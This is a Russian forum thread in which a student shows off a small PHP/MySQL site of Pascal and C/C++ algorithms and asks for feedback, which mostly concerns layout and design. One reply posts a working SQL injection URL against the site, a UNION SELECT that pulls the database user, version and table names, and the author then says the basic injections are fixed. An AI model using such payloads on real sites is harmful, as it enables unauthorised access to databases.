Вот решил сделать небольшой сайтик - сборник алгоритмов по C/C++ и Pascal. Накидал за пару вечеров на каникулах. Дизайнер из меня не очень - поэтому весь упор был сделан на функциональность, так что сильно не серчайте) Вот собственно сам сайтец: http://arhalg.110mb.com/ . Вариант наверное не финальный, что то будет правится. Раньше веб-кодингом не занимался, так что можно сказать это мой первый опыт в связке PHP+MySQL. Делал в основном по просьбе людей, которые вечно парятся с поиском алгоритмов. Мож кому нибуть здесь тоже понадобятся эти алгоритмы. Жду отзывов - чего там не хватает по вашему мнению, и вообще общие впечатления.
В целом сайтик почти пустой... Главная страница пустая кроме ссылки для перехода к контенту ничего нет. Выравнивание в таблицах везде по цендру... при описании кода текст к примеру "Скрипт на Pascal" находится в середине ячейки (по вертикале) и при этом высота ячейки большая... Контент не оценивал но оформление навигации и дизайн - 3
Это я знаю, исправить руки не доходят) Но все равно спасибо. Будет дополняться... Да... над этим нужно будет постараться =)
И нахрена на таком сайте пхп+мускул?Если актуально дополнять не будеш то и на html можно было зделать
не понял зачем нужно было делать главную страницу пустой и ссылку на переход в архив, а вообще думаю что дизайн для твоего сайта далеко не самое главное
Имхо, будет достаточно только твоего ника, ты не сделал револючционное откритые так что фио это лишнее.
Мало, некрасиво, неудобно.. Заполнять, приводить в приятно-читаемый вид Это даже не "маленький сайтик"
мдя http://arhalg.110mb.com/scripts/gener.php?num=-3+union+select+user(),2,3,database(),5,6,version(),TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+17,1/*
Этого можно было дибиться запросом в 10 раз короче) Написал то)))))) И я уже сказал что знаю про это)
Идея хорошая, исполнение не очень... Впринципе уже все сказали выше меня. Если будеш заниматься то возможно вполне прилично получиться... Дерзай.
Всем спасибо - видно что нужно доработать его, при чем много че нужно подправить=) Ну, элементарные скулы убрал - но найти еще что нить можно А так нужно взяться за него, и нормально реализовать.